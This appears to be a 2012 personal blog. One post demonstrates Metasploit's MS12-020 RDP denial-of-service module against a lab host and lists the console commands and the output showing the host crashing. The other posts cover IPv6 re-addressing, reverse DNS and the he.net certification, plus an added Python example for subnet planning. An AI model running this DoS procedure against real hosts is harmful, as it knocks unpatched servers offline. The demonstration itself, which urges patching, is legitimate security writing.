MS12-020 Metasploit Fun

25 03 2012

Metasploit contains a module to DoS Windows hosts with RDP enabled, using the PoC code for the vulnerability patched in MS12-020.

Well, it works 😀 – short & sweet….

The only known code in the wild is for DoS – so far there is no remote code execution – but one step generally leads to the other pretty quickly, so disable / patch / protect your RDP ASAP.

Now you see it:

root@bt:~/vpn/darknet# nmap 10.6.6.1 -p 3389

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-03-25 17:51 EST
Nmap scan report for 10.6.6.1
Host is up (0.0035s latency).
PORT STATE SERVICE
3389/tcp open ms-term-serv

Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds

64 bytes from 10.6.6.1: icmp_seq=99 ttl=127 time=2.90 ms
64 bytes from 10.6.6.1: icmp_seq=100 ttl=127 time=4.13 ms
64 bytes from 10.6.6.1: icmp_seq=101 ttl=127 time=2.85 ms

Now you don't:

root@bt:/opt/metasploit/msf3# ./msfconsole
msf > info auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > show options
msf auxiliary(ms12_020_maxchannelids) > set RHOST 10.6.6.1
RHOST => 10.6.6.1
msf auxiliary(ms12_020_maxchannelids) > exploit

[*] 10.6.6.1:3389 – Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 10.6.6.1:3389 – 210 bytes sent
[*] 10.6.6.1:3389 – Checking RDP status…
[+] 10.6.6.1:3389 seems down
[*] Auxiliary module execution completed
msf auxiliary(ms12_020_maxchannelids) >

From 172.16.0.1 icmp_seq=131 Destination Host Unreachable
From 172.16.0.1 icmp_seq=132 Destination Host Unreachable
From 172.16.0.1 icmp_seq=133 Destination Host Unreachable

w00t BSOD !! – DoS (Crashdump & Reboot)

IPv6 rebooted – web & smtp server

14 03 2012

Now that I had a new IPv6 allocation from tunnelbroker.net – it was time to get the server re-addressed & reachable from the outside world.

Apache was already configured to listen on all IPv4 & IPv6 addresses, so all I needed to do was change the address, test connectivity & restart apache.

sudo ip addr add 2001:470:489e::100/64 dev eth0
sudo route --inet6 add default gateway 2001:470:489e::1
ping6 2001:470:489e::1

Don't forget to update your nameserver entries.

sudo vi /etc/resolv.conf
ping6 ipv6.google.com

Restart the apache & postfix services.

sudo /etc/init.d/apache2 stop
sudo /etc/init.d/apache2 start
sudo /etc/init.d/postfix stop
sudo /etc/init.d/postfix start

Update your DNS record with the new address & test the connection.
You can either test from another IPv6-connected host (like a VPS):

ash@vertex:~$ dig aaaa public.blackundertone.com +short
2001:470:489e::100
ash@vertex:~$ curl public.blackundertone.com

Or use one of the many publicly available test servers – like http://ipv6-test.com/validate.php.

It's as simple as that. Now my server was once again reachable via IPv6 – all this effort to get back to where I was.

Next time – I'll cover the DNS forward & reverse fun, as well as why I needed to transfer my domain from namecheap.com free DNS hosting to the free DNS hosting provided by Hurricane Electric @ dns.he.net.

IPv6 rebooted – IPv6 SAGE Certification Project (part1)

13 03 2012

[Image: IPv6 Certification Badge for blackundertone]

Well – it's official – I am an IPv6 consumer. I have a public facing IPv6 web & smtp server – and I have passed the requirements of the Hurricane Electric (he.net) IPv6 certification program to the SAGE level – http://ipv6.he.net/certification/

I already had IPv6 through Freenet6 – as I detailed in my previous IPv6 post here – so I began the IPv6 certification program, and ran through the first few basic levels.

  • I can reach the site with IPv6 – Check
  • he.net can reach my IPv6 website – Check
  • he.net can send me email (had to stand up postfix for this one) – Check

This got me to the Administrator level – anyone with IPv6 connectivity can easily get here – simply have a reachable IPv6 website & mail server.

This is where the fun came in. To get to the next level (Professional) – I needed a working reverse DNS entry for my mailserver. Now while this sounds simple – freenet6 doesn't appear to provide an easy way to configure reverse DNS entries for the IPv6 range they provide you – bummer.

My Astaro box provides built-in support for several tunnel brokers: gogo6 Freenet6, Hurricane Electric & SixXS.

I had exhausted my energy trying to set up reverse DNS with Freenet6, so off to Hurricane Electric I went – it seemed a logical choice considering I was doing their certification anyway. Signup was simple & within minutes I had a new IPv6 allocation. They initially allocate a single /64 – but once you have enabled your connection – you can request a /48 – which of course I did.

So – now that I have a new allocation, here is how I configured it on my network.

In Astaro: Interfaces & Routing -> IPv6 (Click Enable), then from the Tunnel Broker tab, simply enter your tunnelbroker.net username & password.

Minutes later, the /64 range on your tunnelbroker.net account page should appear in the global tab.

A couple of tests later & I confirmed I could ping IPv6 addresses from my Astaro box (example here using the ns2.he.net nameserver address).

I decided to use the initial /64 I was allocated as the range for my internal hosts, and then break up the /48 into subnets for other zones.

By far the easiest way to use IPv6 is to let “Stateless Auto Configuration” work its magic. It doesn't require DHCP, and allows hosts to automatically find the router & get an address – it pretty much works as it says on the box.

Simply add an IPv6 address to the FW interface you want to run IPv6 on, then advertise the subnet out.

Suddenly your internal hosts will be getting IPv6 addresses & will be EXTERNALLY REACHABLE <— This is important. Make sure you set up your firewall rules, host protection etc etc. I will not cover this step, but you need to ensure you understand that as soon as your box has an IPv6 address – it is publicly routable from the outside world.

Repeat the addition of an IPv6 address (from another /64 subnet – broken up out of the /48 you requested from tunnelbroker.net) to the DMZ interface(s). I am not enabling “Stateless Auto Configuration” on my DMZ segments, I am just manually assigning addresses to the couple of boxes in there.
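Added example (not code from the posts): planning the /64 zones for the internal and DMZ segments out of the requested /48, and generating the AAAA plus ip6.arpa PTR records the mail server needs for the Professional level's reverse DNS check. The /48 prefix is a constructed placeholder (the posts never give the real one); the /64 and the host address are the ones used above.

```python
"""Plan /64 zones out of a tunnelbroker.net allocation and derive the DNS
records a host needs: forward AAAA plus the ip6.arpa PTR for reverse DNS."""
import ipaddress

# The /64 is the one from the posts above; the /48 is a constructed
# placeholder, since the posts never give the real routed /48 prefix.
TUNNEL_64 = ipaddress.IPv6Network("2001:470:489e::/64")
ROUTED_48 = ipaddress.IPv6Network("2001:db8:489e::/48")  # constructed


def carve_zones(routed_48, zone_names):
    """Hand one /64 per zone out of the /48, in order: {zone: network}."""
    if routed_48.prefixlen != 48:
        raise ValueError(f"expected a /48, got /{routed_48.prefixlen}")
    return dict(zip(zone_names, routed_48.subnets(new_prefix=64)))


def zone_of(addr, zones):
    """Zone whose /64 contains addr, or None if it is outside the plan."""
    ip = ipaddress.IPv6Address(addr)
    for name, net in zones.items():
        if ip in net:
            return name
    return None


def reverse_zone(network):
    """ip6.arpa zone that must be delegated to you before you can publish
    PTRs under this prefix (one nibble label per 4 bits of prefix)."""
    nibbles = network.prefixlen // 4
    hexdigits = network.network_address.exploded.replace(":", "")
    return ".".join(reversed(hexdigits[:nibbles])) + ".ip6.arpa"


def dns_records(hostname, addr):
    """Forward AAAA and the matching PTR, so a receiving mail server (and
    he.net's check) can confirm the name round-trips to the address."""
    ip = ipaddress.IPv6Address(addr)
    return [(hostname, "AAAA", ip.compressed),
            (ip.reverse_pointer, "PTR", hostname)]


if __name__ == "__main__":
    zones = {"internal": TUNNEL_64}
    zones.update(carve_zones(ROUTED_48, ["dmz", "lab"]))
    for name, net in zones.items():
        print(f"{name:9} {str(net):<22} reverse zone: {reverse_zone(net)}")
    for rr in dns_records("public.blackundertone.com", "2001:470:489e::100"):
        print(rr)
```

The PTR owner name printed for the mail server is what goes into the dns.he.net reverse zone; the `reverse_zone` output is the zone HE must delegate to you first.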

Right – that covers the move to Hurricane Electric & how to re-address the internal & DMZ segments.

Next steps are re-addressing my public web & smtp server, updating the DNS forward & reverse zone entries – and what is needed to complete the rest of the certification.